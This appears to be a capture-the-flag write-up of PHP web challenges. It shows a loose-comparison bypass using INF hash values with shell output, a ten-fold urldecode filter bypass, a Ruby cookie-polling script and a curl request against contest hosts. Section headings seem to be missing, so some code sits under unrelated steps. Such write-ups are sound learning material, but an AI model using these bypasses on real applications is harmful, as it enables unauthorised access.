So let's try to bypass that with null, NaN, void string, INF and that kind of stuff with the loose comparison.
If we put a hash that begin with an integer in log10($a**(0.5)))**2 that number before the first letter is used. Eg. 18ac3e7343f016890c510e93f935261169d9e3f565436429830faf0934f4f8e4 will be evaluated as 18 or something. But more importantly hashes beginning with a letter will be evaluated as an infinite float after being injected in the formula.
php > var_dump((log10("a1fce4363854ff888cff4b8e7875d600c2682390412a8cf79b37d0b11148b0fa"**(0.5)))**2); PHP Warning: A non-numeric value encountered in php shell code on line 1 float(INF)
The very big numbers are also generating an INF like 9e99999999999999999999999999999999999999999.
1 2 3
php > var_dump((log10(hash("sha256", "y")**(0.5)))**2 == "9e99999999999999999999999999999999999999999"); PHP Warning: A non-numeric value encountered in php shell code on line 1 bool(true)
php > var_dump((log10(hash("sha256", "y")**(0.5)))**2 == "9e99999999999999999999999999999999999999999" * "9e99999999999999999999999999999999999999999" + "9e99999999999999999999999999999999999999999" * "9e99999999999999999999999999999999999999999"); PHP Warning: A non-numeric value encountered in php shell code on line 1 bool(true)
And the trick is done.
Use val1=y&val2=b&val3=8e99999999999999999999999999999999999999999&val4=9e99999999999999999999999999999999999999999 as params and get the first part of the flag.
pctf{b3_c4r3fu1_duck
The second part is only using $b which is not used in the first part so they are totally independent.
1 2 3 4 5 6 7
for ($i = 1; $i <= 10; $i++) { if ($b == urldecode($b)) die('duck'); else$b = urldecode($b); }
if ($b === "WoAHh!") $s2 = "true"; elsedie('oops..');
We just need the final result to be WoAHh! and $b to be able to be urldecoded 10 times.
So let's encode ! = %21 and then % = %25 ten times:
uri = URI('http://159.89.166.12:13500/') http = Net::HTTP.start(uri.hostname, uri.port) req = Net::HTTP::Get.new(uri)
cookie = '' i = 0
whiletrue req['Cookie'] = 'flag=' + cookie unless cookie.empty? res = http.request(req) if res.is_a?(Net::HTTPSuccess) cookie = res['Set-Cookie'].split('=')[1] puts cookie end if cookie == 'bc54f4d60f1cec0f9a6cb70e13f2127a' i += 1 breakif i > 1 end end
The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.
Just use the fake upload param with curl 'http://159.89.166.12:15000/?profile_pic=':